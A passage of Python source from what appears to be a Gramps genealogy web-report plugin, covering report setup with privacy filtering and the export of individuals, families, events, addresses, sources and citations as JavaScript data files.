class,\n\tindexed by the database handle,\n\tcontaining for each report object the following information:\n\t - object file name, if any,\n\t - object name,\n\t - gramps id,\n\t - object index, starting from 0,\n\t only counting the objects selected,\n\t each object type is counted separately.\n\t\n\tThe references to objects are stored as dictionaries \"bkref_dict[class][handle]\",\n\tindexed by the object class,\n\tindexed by the database handle,\n\tcontaining for each report object the following information:\n\t - class of the object referencing it,\n\t - handle of the object referencing it,\n\t - reference object (MediaRef, EventRef) if any.\n\t \n\tThe report is generated by L{write_report}\n\t\"\"\"\n\n\tdef __init__(self, database, options, user):\n\t\t\"\"\"\n\t\tCreate WebReport object that produces the report.\n\n\t\tThe arguments are:\n\n\t\tdatabase - the Gramps database instance\n\t\toptions - instance of the Options class for this report\n\t\tuser - instance of a gen.user.User()\n\t\t\"\"\"\n\n\t\tReport.__init__(self, database, options, user)\n\t\tself.user = user\n\t\tmenu = options.menu\n\t\tself.link_prefix_up = True\n\t\tself.options = {}\n\n\t\tfor optname in menu.get_all_option_names():\n\t\t\tmenuopt = menu.get_option_by_name(optname)\n\t\t\tself.options[optname] = menuopt.get_value()\n\n\t\tif not self.options['incpriv']:\n\t\t\tself.database = PrivateProxyDb(database)\n\t\telse:\n\t\t\tself.database = database\n\n\t\tlivinginfo = self.options['living']\n\t\tyearsafterdeath = self.options['yearsafterdeath']\n\n\t\tif livinginfo != INCLUDE_LIVING_VALUE:\n\t\t\tself.database = LivingProxyDb(self.database, livinginfo, None, yearsafterdeath)\n\n\t\tfilters_option = menu.get_option_by_name('filter')\n\t\tself.filter = filters_option.get_filter()\n\n\t\tself.target_path = self.options['target'] #: Destination directory\n\t\tself.ext = \".html\" #: HTML fiules extension\n\t\tself.title = self.options['title'] #: Web site title. Web pages title are in the form \"title of the page - title of the site\"\n\n\t\tself.author = get_researcher().get_name() #: Database author name. Used in copyright text.\n\t\tif self.author:\n\t\t\tself.author = self.author.replace(',,,', '')\n\n\t\t# The following data are local copies of the options. Refer to the L{DynamicWebOptions} class for more details.\n\t\tself.inc_events = self.options['inc_events']\n\t\tself.inc_places = self.options['inc_places']\n\t\tself.inc_families = self.options['inc_families']\n\t\tself.inc_gallery = self.options['inc_gallery']\n\t\tself.copy_media = self.options['copy_media']\n\t\tself.inc_notes = self.options['inc_notes']\n\t\tself.print_notes_type = self.options['print_notes_type']\n\t\tself.inc_sources = self.options['inc_sources']\n\t\tself.inc_repositories = self.options['inc_repositories']\n\t\t# Repositories are not exported unless sources are exported\n\t\tself.inc_repositories = self.inc_repositories and self.inc_sources\n\t\tself.inc_addresses = self.options['inc_addresses']\n\t\tself.name_format = self.options['name_format']\n\t\tself.short_name_format = self.options['short_name_format']\n\t\tself.encoding = self.options['encoding']\n\t\tself.copyright = self.options['copyright']\n\t\tself.inc_gendex = self.options['inc_gendex']\n\t\tself.template = self.options['template']\n\t\tself.pages_number = self.options['pages_number']\n\t\tself.page_content = [\n\t\t\tself.options['page_content_%i' %i]\n\t\t\tfor i in range(self.pages_number)\n\t\t]\n\t\tself.page_name = [\n\t\t\tself.options['page_name_%i' %i]\n\t\t\tfor i in range(len(PAGES_NAMES))\n\t\t]\n\t\tself.custom_menu = [\n\t\t\tself.options['custom_menu_%i' %i]\n\t\t\tfor i in range(NB_CUSTOM_PAGES)\n\t\t]\n\t\tself.custom_note = [\n\t\t\tself.options['custom_note_%i' %i]\n\t\t\tfor i in range(NB_CUSTOM_PAGES)\n\t\t]\n\t\t# Filter pages that cannot be exported due to other options\n\t\tself.page_content = [pc for pc in self.page_content if (not(\n\t\t\t(pc == PAGE_FAMILY_INDEX and not self.inc_families) or\n\t\t\t(pc == PAGE_MEDIA_INDEX and not self.inc_gallery) or\n\t\t\t(pc == PAGE_SOURCE_INDEX and not self.inc_sources) or\n\t\t\t(pc == PAGE_REPOSITORY_INDEX and not self.inc_repositories) or\n\t\t\t(pc == PAGE_PLACE_INDEX and not self.inc_places)\n\t\t))]\n\t\tself.pages_number = len(self.page_content)\n\n\t\tself._backend = HtmlBackend()\n\t\tself._backend.build_link = self.build_link\n\n\n\tdef write_report(self):\n\t\t\"\"\"\n\t\tReport generation\n\t\t\"\"\"\n\t\t\n\t\t# Initialize the logger\n\t\t# This initialization shall be performed after Gramps has start-up\n\t\t# import importlib\n\t\t# logging = importlib.reload(logging)\n\t\t# global log\n\t\t# log = logging.getLogger(\".DynamicWeb\")\n\t\t\n\t\t# Create directory\n\t\tdir_name = self.target_path\n\t\tif dir_name is None:\n\t\t\tdir_name = get_curr_dir()\n\t\telif not os.path.isdir(dir_name):\n\t\t\tparent_dir = os.path.dirname(dir_name)\n\t\t\tif not os.path.isdir(parent_dir):\n\t\t\t\tmsg = _(\"Neither %(current)s nor %(parent)s are directories\") % \\\n\t\t\t\t\t {'current': dir_name, 'parent': parent_dir}\n\t\t\t\tself.user.notify_error(msg)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tos.mkdir(dir_name)\n\t\t\t\texcept IOError as value:\n\t\t\t\t\tmsg = _(\"Could not create the directory: %(path)s\") % {\n\t\t\t\t\t\t \"path\": dir_name + \"\\n\" + value[1]}\n\t\t\t\t\tself.user.notify_error(msg)\n\t\t\t\t\treturn\n\t\t\t\texcept:\n\t\t\t\t\tmsg = _(\"Could not create the directory: %(path)s\") % {\"path\": dir_name}\n\t\t\t\t\tself.user.notify_error(msg)\n\t\t\t\t\treturn\n\t\tconfig.set('paths.website-directory', os.path.dirname(self.target_path) + os.sep)\n\n\n\t\t# for use with discovering biological, half, and step siblings for use\n\t\t# in display_ind_parents()...\n\t\t# self.rel_class = get_relationship_calculator()\n\n\t\t#: List of images already copied\n\t\tself.images_copied = set()\n\n\t\t#: List of thumbnails already created\n\t\tself.thumbnail_created = set()\n\n\t\t#################################################\n\t\t# Pass 1 Build the lists of objects to be output\n\n\t\tself._build_obj_dict()\n\t\tself._sort_obj_dict()\n\n\t\t#################################################\n\t\t# Pass 2 Generate the web pages\n\t\t\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"), _(\"Exporting family tree data ...\"), 10) as step:\n\t\t\tself.created_files = []\n\t\t\t# Create directories\n\t\t\tfor dirname in [\"thumb\"] + ([\"image\"] if (self.copy_media) else []):\n\t\t\t\tdirpath = os.path.join(self.target_path, dirname)\n\t\t\t\tif (not os.path.isdir(dirpath)): os.mkdir(dirpath)\n\t\t\t# Copy web site files\n\t\t\tself.copy_template_files()\n\t\t\tstep()\n\t\t\t# Export database as Javascript files\n\t\t\tself._export_individuals()\n\t\t\tstep()\n\t\t\tself._export_families()\n\t\t\tstep()\n\t\t\tself._export_sources()\n\t\t\tself._export_citations()\n\t\t\tself._export_repositories()\n\t\t\tstep()\n\t\t\tself._export_places()\n\t\t\tstep()\n\t\t\tself._export_media()\n\t\t\tstep()\n\t\t\tself._export_surnames()\n\t\t\tstep()\n\t\t\t# Generate HTML files\n\t\t\tself._export_pages()\n\t\t\tstep()\n\t\t\t# Create GENDEX file\n\t\t\tself.build_gendex(self.obj_dict[Person])\n\t\t\tstep()\n\t\t\t# Create an archive file of the web site\n\t\t\tself.create_archive()\n\t\t\tstep()\n\n\n\tdef _export_individuals(self):\n\t\t\"\"\"\n\t\tExport individuals data in Javascript file\n\t\tThe individuals data is stored in the Javascript Array \"I\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'I' is sorted by person name\\n\"\n\t\t\t\"// 'I' gives for individual:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The complete name\\n\"\n\t\t\t\"// - The short name\\n\"\n\t\t\t\"// - The names as a list of:\\n\"\n\t\t\t\"// [full name, type, title, nick, call, given, suffix, list of surnames, family nickname,\\n\"\n\t\t\t\"// notes, list of the name source citations index (in table 'C')]\\n\"\n\t\t\t\"// - The gender\\n\"\n\t\t\t\"// - The birth year in the form '1700', '?' (date unknown)\\n\"\n\t\t\t\"// - The birth place\\n\"\n\t\t\t\"// - The death year in the form '1700', '?' (date unknown), '' (not dead)\\n\"\n\t\t\t\"// - The death place\\n\"\n\t\t\t\"// - The death age\\n\"\n\t\t\t\"// - A list of events, with for each event:\\n\"\n\t\t\t\"// - The event name\\n\"\n\t\t\t\"// - The event date\\n\"\n\t\t\t\"// - The event date in ISO format (sortable)\\n\"\n\t\t\t\"// - The event place index (in table 'P'), -1 if none\\n\"\n\t\t\t\"// - The event description\\n\"\n\t\t\t\"// - The event text and notes (including event reference notes)\\n\"\n\t\t\t\"// - A list of the event media index, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the event source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of addresses, with for each address:\\n\"\n\t\t\t\"// - The address date\\n\"\n\t\t\t\"// - The address date in ISO format (sortable)\\n\"\n\t\t\t\"// - The address place in the form:\\n\"\n\t\t\t\"// [street, locality, parish, city, state, county, zip, country]\\n\"\n\t\t\t\"// - The address notes\\n\"\n\t\t\t\"// - A list of the address source citations index (in table 'C')\\n\"\n\t\t\t\"// - The person notes\\n\"\n\t\t\t\"// - A list of the person media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the person source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the person attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - The list of the person URL in the form:\\n\"\n\t\t\t\"// [type, url, description]\\n\"\n\t\t\t\"// - A list of partners families index (in table 'F')\\n\"\n\t\t\t\"// - A list of parents families in the form:\\n\"\n\t\t\t\"// [index (in table 'F'), relation to father, relation to mother, notes, list of citations]\\n\"\n\t\t\t\"// - A list of associations in the form:\\n\"\n\t\t\t\"// [person index (in table 'I'), relationship, notes, list of citations (in table 'C')]\\n\"\n\t\t\t\"I = [\")\n\t\tsep = \"\\n\"\n\t\tperson_list = list(self.obj_dict[Person].keys())\n\t\tperson_list.sort(key = lambda x: self.obj_dict[Person][x][OBJDICT_INDEX])\n\t\tfor person_handle in person_list:\n\t\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Person][person_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\t# Names\n\t\t\tname = self.get_name(person) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\")\n\t\t\tname = self.get_short_name(person) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\tsw.write(self.get_name_data(person) + \",\\n\")\n\t\t\t# Gender\n\t\t\tgender = \"\"\n\t\t\tif (person.get_gender() == Person.MALE): gender = \"M\"\n\t\t\tif (person.get_gender() == Person.FEMALE): gender = \"F\"\n\t\t\tif (person.get_gender() == Person.UNKNOWN): gender = \"U\"\n\t\t\tsw.write(\"\\\"\" + gender + \"\\\",\")\n\t\t\t# Years\n\t\t\tsw.write(\"\\\"\" + self.get_birth_year(person) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_birth_place(person) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_death_year(person) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_death_place(person) + \"\\\",\\n\")\n\t\t\t# Age at death\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_death_age(person)) + \"\\\",\\n\")\n\t\t\t# Events\n\t\t\tsw.write(\"[\\n\" + self._data_events(person) + \"\\n],\\n\")\n\t\t\t# Addresses\n\t\t\tsw.write(\"[\\n\" + self._data_addresses(person) + \"\\n],\\n\")\n\t\t\t# Get individual notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(person)) + \"\\\",\\n\")\n\t\t\t# Get individual media\n\t\t\tsw.write(self._data_media_reference_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual sources\n\t\t\tsw.write(self._data_source_citation_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual attributes\n\t\t\tsw.write(self._data_attributes(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get individual URL\n\t\t\tsw.write(self._data_url_list(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Families (partners)\n\t\t\tsw.write(self._data_families_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Families (parents)\n\t\t\tsw.write(self._data_parents_families_index(person))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Associations\n\t\t\tsw.write(self._data_associations(person))\n\t\t\tsw.write(\"\\n]\")\n\t\t\t#\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_indi.js\", sw.getvalue())\n\n\n\tdef get_name_data(self, person):\n\t\tprimary_name = person.get_primary_name()\n\t\tall_names = [primary_name] + person.get_alternate_names()\n\t\tfirst_name = primary_name.get_first_name()\n\t\ttext = \"[\"\n\t\tsep = \"\"\n\t\tfor name in all_names:\n\t\t\ttext += sep + \"[\"\n\t\t\tname.set_display_as(self.name_format)\n\t\t\tpname = _nd.display_name(name)\n\t\t\ttext += \"\\\"\" + script_escape(pname) + \"\\\",\"\n\t\t\t# Type\n\t\t\ttext += \"\\\"\" + script_escape(str(name.get_type())) + \"\\\",\"\n\t\t\t# Title\n\t\t\ttitle = name.get_title() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(title)) + \"\\\",\"\n\t\t\t# Nickname\n\t\t\tnick_name = name.get_nick_name()\n\t\t\tif (nick_name == first_name or not nick_name): nick_name = \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(nick_name)) + \"\\\",\"\n\t\t\t# Callname\n\t\t\tcall_name = name.get_call_name()\n\t\t\tif (call_name == first_name or not call_name): call_name = \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(call_name)) + \"\\\",\"\n\t\t\t# Given\n\t\t\tgiven = name.get_first_name() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(given)) + \"\\\",\"\n\t\t\t# Suffix\n\t\t\tsuffix = name.get_suffix() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(suffix)) + \"\\\",\"\n\t\t\t# Surnames\n\t\t\tsurnames = name.get_surname_list()\n\t\t\ttext += \"[\" + \",\".join([\n\t\t\t\t\"\\\"\" + script_escape(str(surname.get_surname() or \"\")) + \"\\\"\"\n\t\t\t\tfor surname in surnames]) + \"],\"\n\t\t\t# Family nickname\n\t\t\tfnick = name.get_family_nick_name() or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(str(fnick)) + \"\\\",\"\n\t\t\t# Get name date\n\t\t\tdatetext = format_date(name.date) or \"\"\n\t\t\ttext += \"\\\"\" + script_escape(datetext) + \"\\\",\"\n\t\t\t# Get name notes\n\t\t\ttext += \"\\\"\" + script_escape(self.get_notes_text(name)) + \"\\\",\"\n\t\t\t# Get name sources\n\t\t\ttext += self._data_source_citation_index(name) + \"]\"\n\t\t\tsep = \",\"\n\t\ttext += \"]\"\n\t\treturn(text)\n\n\n\tdef get_name_object(self, person, maiden_name = None):\n\t\t\"\"\"\n\t\tReturn person's name, unless maiden_name given, unless married_name\n\t\tlisted.\n\t\t@param: person -- person object from database\n\t\t@param: maiden_name -- Female's family surname\n\t\t\"\"\"\n\t\t# Get all of a person's names\n\t\tprimary_name = person.get_primary_name()\n\t\tmarried_name = None\n\t\tnames = [primary_name] + person.get_alternate_names()\n\t\tfor name in names:\n\t\t\tif int(name.get_type()) == NameType.MARRIED:\n\t\t\t\tmarried_name = name\n\t\t\t\tbreak # use first\n\t\t# Now, decide which to use:\n\t\tif maiden_name is not None:\n\t\t\tif married_name is not None:\n\t\t\t\tname = Name(married_name)\n\t\t\telse:\n\t\t\t\tname = Name(primary_name)\n\t\t\t\tsurname_obj = name.get_primary_surname()\n\t\t\t\tsurname_obj.set_surname(maiden_name)\n\t\telse:\n\t\t\tname = Name(primary_name)\n\t\treturn(name)\n\n\n\tdef get_name(self, person, maiden_name = None):\n\t\tname = self.get_name_object(person, maiden_name)\n\t\tname.set_display_as(self.name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef get_short_name(self, person, maiden_name = None):\n\t\tname = self.get_name_object(person, maiden_name)\n\t\tname.set_display_as(self.short_name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef _export_families(self):\n\t\t\"\"\"\n\t\tExport families data in Javascript file\n\t\tThe families data is stored in the Javascript Array \"F\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'F' is sorted by family full name\\n\"\n\t\t\t\"// 'F' gives for each family:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The family full name\\n\"\n\t\t\t\"// - The family union type\\n\"\n\t\t\t\"// - The marriage year in the form '1700', '?' (unknown), or '' (not married)\\n\"\n\t\t\t\"// - The marriage place\"\n\t\t\t\"// - A list of events, with for each event:\\n\"\n\t\t\t\"// - The event name\\n\"\n\t\t\t\"// - The event date\\n\"\n\t\t\t\"// - The event date in ISO format (sortable)\\n\"\n\t\t\t\"// - The event place index (in table 'P'), -1 if none\\n\"\n\t\t\t\"// - The event description\\n\"\n\t\t\t\"// - The event text and notes (including event reference notes)\\n\"\n\t\t\t\"// - A list of the event media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the event source citations index (in table 'C')\\n\"\n\t\t\t\"// - The family notes\\n\"\n\t\t\t\"// - A list of the family media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the family source citations index (in table 'C')\\n\"\n\t\t\t\"// - The list of the family attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"// - A list of spouses index (in table 'I')\\n\"\n\t\t\t\"// - A list of child in the form:\\n\"\n\t\t\t\"// [index (in table 'I'), relation to father, relation to mother, notes, list of citations]\\n\"\n\t\t\t\"F = [\")\n\t\tsep = \"\\n\"\n\t\tfamily_list = list(self.obj_dict[Family].keys())\n\t\tfamily_list.sort(key = lambda x: self.obj_dict[Family][x][OBJDICT_INDEX])\n\t\tfor family_handle in family_list:\n\t\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Family][family_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\t# Names\n\t\t\tname = self.get_family_name(family) or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(name) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + script_escape(str(family.get_relationship())) + \"\\\",\\n\")\n\t\t\t# Years\n\t\t\tsw.write(\"\\\"\" + self.get_marriage_year(family) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\" + self.get_marriage_place(family) + \"\\\",\\n\")\n\t\t\t# Events\n\t\t\tsw.write(\"[\\n\" + self._data_events(family) + \"\\n],\\n\")\n\t\t\t# Get family notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(family)) + \"\\\",\\n\")\n\t\t\t# Get family media\n\t\t\tsw.write(self._data_media_reference_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get family sources\n\t\t\tsw.write(self._data_source_citation_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get family attributes\n\t\t\tsw.write(self._data_attributes(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Partners\n\t\t\tsw.write(self._data_partners_index(family))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Children\n\t\t\tsw.write(self._data_children_index(family))\n\t\t\tsw.write(\"\\n]\")\n\t\t\t#\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_fam.js\", sw.getvalue())\n\n\n\tdef _data_events(self, object):\n\t\t\"\"\"\n\t\tBuild events data related to L{object} in a string representing a Javascript Array\n\t\tL{object} could be: a person or a family\n\t\t@return: events as a string representing a Javascript Array\n\t\t\"\"\"\n\t\t# Builds an event list that gives for each event:\n\t\t# - Gramps ID\\n\"\n\t\t# - The event name\n\t\t# - The event date\n\t\t# - The event date in ISO format (sortable)\n\t\t# - The event place index (in table 'P'), -1 if none\n\t\t# - The event description\n\t\t# - The event text and notes (including event reference notes)\n\t\t# - A list of the event media index, in the form:\n\t\t# - media index (in table 'M')\n\t\t# - media thumbnail path\n\t\t# - [x1, y1, x2, y2] of the media reference\n\t\t# - notes of the media reference\n\t\t# - list of the media reference source citations index (in table 'C')\\n\"\n\t\t# - A list of the event source citations index (in table 'C')\n\t\tevent_ref_list = object.get_event_ref_list()\n\t\tif not event_ref_list: return(\"\")\n\t\trows = []\n\t\tfor event_ref in event_ref_list:\n\t\t\tif (event_ref.ref not in self.obj_dict[Event]): continue\n\t\t\tevent = self.database.get_event_from_handle(event_ref.ref)\n\t\t\tif (not event): continue\n\t\t\ttrow = \"\\t[\"\n\t\t\tevt_type = str(event.get_type())\n\t\t\tevent_role = event_ref.get_role()\n\t\t\tif (event_role != EventRoleType.PRIMARY and event_role != EventRoleType.FAMILY):\n\t\t\t\tevt_type += \" (%s)\" % event_role\n\t\t\tplace_index = -1\n\t\t\tplace_handle = event.get_place_handle()\n\t\t\tif (place_handle and (place_handle in self.obj_dict[Place])):\n\t\t\t\tplace_index = self.obj_dict[Place][place_handle][OBJDICT_INDEX]\n\t\t\tevt_desc = event.get_description()\n\t\t\ttrow += \"\\\"\" + self.obj_dict[Event][event_ref.ref][OBJDICT_GID] + \"\\\",\"\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_type)) + \"\\\",\"\n\t\t\tevt_date = format_date(event.get_date_object())\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_date)) + \"\\\",\"\n\t\t\tevt_date = format_date(event.get_date_object(), True)\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_date)) + \"\\\",\"\n\t\t\ttrow += str(place_index) + \",\"\n\t\t\tif (evt_desc is None): evt_desc = \"\"\n\t\t\ttrow += \"\\\"\" + script_escape(html_escape(evt_desc)) + \"\\\",\"\n\t\t\t# Get event notes\n\t\t\tnotelist = event.get_note_list()\n\t\t\tnotelist.extend(event_ref.get_note_list())\n\t\t\tattrlist = event.get_attribute_list()\n\t\t\tattrlist.extend(event_ref.get_attribute_list())\n\t\t\ttrow += \"\\\"\" + script_escape(self.get_notes_attributes_text(notelist, attrlist)) + \"\\\",\"\n\t\t\t# Get event media\n\t\t\ttrow += self._data_media_reference_index(event)\n\t\t\ttrow += \",\"\n\t\t\t# Get event sources\n\t\t\tcitationlist = event.get_citation_list()\n\t\t\tcitationlist.extend(event_ref.get_citation_list())\n\t\t\tfor attr in attrlist: citationlist.extend(attr.get_citation_list())\n\t\t\ttrow += self._data_source_citation_index_from_list(citationlist)\n\t\t\t#\n\t\t\ttrow += \"]\"\n\t\t\trows.append(trow)\n\t\treturn(\",\\n\".join(rows))\n\n\n\tdef _data_addresses(self, object):\n\t\t\"\"\"\n\t\tExport addresses data related to L{object} in a string representing a Javascript Array\n\t\tL{object} could be: a person or a repository\n\t\t@return: events as a string representing a Javascript Array\n\t\t\"\"\"\n\t\t# Builds an address list that gives for each address:\n\t\t# - The address date\\n\"\n\t\t# - The address date in ISO format (sortable)\\n\"\n\t\t# - The address place in the form:\\n\"\n\t\t# [street, locality, parish, city, state, county, zip, country]\\n\"\\n\"\n\t\t# - The address notes\\n\"\n\t\t# - A list of the address source citations index (in table 'C')\\n\"\n\t\tif (not self.inc_addresses): return(\"\")\n\t\taddrlist = object.get_address_list()\n\t\tif not addrlist: return(\"\")\n\t\trows = []\n\t\tfor addr in addrlist:\n\t\t\ttext = \"\\t[\"\n\t\t\taddr_date = format_date(addr.get_date_object())\n\t\t\ttext += \"\\\"\" + script_escape(html_escape(addr_date)) + \"\\\",\"\n\t\t\taddr_date = format_date(addr.get_date_object(), True)\n\t\t\ttext += \"\\\"\" + script_escape(html_escape(addr_date)) + \"\\\",\"\n\t\t\taddr_data = [\n\t\t\t\taddr.get_street(),\n\t\t\t\taddr.get_locality(),\n\t\t\t\t\"\",\n\t\t\t\taddr.get_city(),\n\t\t\t\taddr.get_state(),\n\t\t\t\taddr.get_county(),\n\t\t\t\taddr.get_postal_code(),\n\t\t\t\taddr.get_country(),\n\t\t\t\taddr.get_phone(),\n\t\t\t]\n\t\t\ttext += \"[\\\"\" + \"\\\",\\\"\".join([script_escape(data) for data in addr_data]) + \"\\\"],\"\n\t\t\t# Get address notes\n\t\t\ttext += \"\\\"\" + script_escape(self.get_notes_text(addr)) + \"\\\",\"\n\t\t\t# Get address sources\n\t\t\ttext += self._data_source_citation_index(addr) + \"]\"\n\t\t\trows.append(text)\n\t\treturn(\",\\n\".join(rows))\n\n\n\tdef _export_sources(self):\n\t\t\"\"\"\n\t\tExport sources data in Javascript file\n\t\tThe sources data is stored in the Javascript Array \"S\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'S' is sorted by source title\\n\"\n\t\t\t\"// 'S' gives for each source:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The source title\\n\"\n\t\t\t\"// - The source text (author, etc.)\\n\"\n\t\t\t\"// - The source notes\\n\"\n\t\t\t\"// - A list of the source media references, in the form:\\n\"\n\t\t\t\"// - media index (in table 'M')\\n\"\n\t\t\t\"// - media thumbnail path\\n\"\n\t\t\t\"// - [x1, y1, x2, y2] of the media reference\\n\"\n\t\t\t\"// - notes of the media reference\\n\"\n\t\t\t\"// - list of the media reference source citations index (in table 'C')\\n\"\n\t\t\t\"// - A list of the citations index (in table 'C') referencing this source\\n\"\n\t\t\t\"// - A list of the repositories for this source, in the form:\\n\"\n\t\t\t\"// - repository index (in table 'R')\\n\"\n\t\t\t\"// - media type\\n\"\n\t\t\t\"// - call number\\n\"\n\t\t\t\"// - notes of the repository reference\\n\"\n\t\t\t\"// - The list of the sources attributes in the form:\\n\"\n\t\t\t\"// [attribute, value, note, list of citations]\\n\"\n\t\t\t\"S = [\")\n\t\tsep = \"\\n\"\n\t\tsource_list = list(self.obj_dict[Source])\n\t\tif (not self.inc_sources): source_list = []\n\t\tsource_list.sort(key = lambda x: self.obj_dict[Source][x][OBJDICT_INDEX])\n\t\tfor source_handle in source_list:\n\t\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\t\tsw.write(sep)\n\t\t\tsw.write(\"[\\\"\" + self.obj_dict[Source][source_handle][OBJDICT_GID] + \"\\\",\")\n\t\t\ttitle = source.get_title() or \"\"\n\t\t\tsw.write(\"\\\"\" + script_escape(html_escape(title)) + \"\\\",\\n\")\n\t\t\tsw.write(\"\\\"\")\n\t\t\tfor (label, value) in [\n\t\t\t\t(_(\"Author\"), source.get_author()),\n\t\t\t\t(_(\"Abbreviation\"), source.get_abbreviation()),\n\t\t\t\t(_(\"Publication information\"), source.get_publication_info())]:\n\t\t\t\tif value:\n\t\t\t\t\thtml = Html(\"p\") + Html(\"b\", label + \": \") + value\n\t\t\t\t\tsw.write(script_escape(html_text(html)))\n\t\t\tsw.write(\"\\\",\\n\")\n\t\t\t# Get source notes\n\t\t\tsw.write(\"\\\"\" + script_escape(self.get_notes_text(source)) + \"\\\",\\n\")\n\t\t\t# Get source media\n\t\t\tsw.write(self._data_media_reference_index(source))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source citations\n\t\t\tsw.write(self._data_bkref_index(Source, source_handle, Citation))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get repositories references\n\t\t\tsw.write(self._data_repo_reference_index(source))\n\t\t\tsw.write(\",\\n\")\n\t\t\t# Get source attributes\n\t\t\tif (DWR_VERSION_410):\n\t\t\t\tsw.write(self._data_attributes_src(source))\n\t\t\telse:\n\t\t\t\tsw.write(\"[]\")\n\t\t\tsw.write(\"\\n]\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n];\\n\")\n\t\tself.update_file(\"dwr_db_sour.js\", sw.getvalue())\n\n\n\tdef _export_citations(self):\n\t\t\"\"\"\n\t\tExport citations data in Javascript file\n\t\tThe citations data is stored in the Javascript Array \"C\"\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\n\t\t\t\"// This file is generated\\n\\n\"\n\t\t\t\"// 'C' gives for each source citation:\\n\"\n\t\t\t\"// - Gramps ID\\n\"\n\t\t\t\"// - The source index (in table 'S')\\n\"\n\t\t\t\"// - The citation text (page, etc.)\\n\"\n\t\t\t\"// - The citation notes\\n\"\n\t\t\t\"// - A list of the citation media references, in 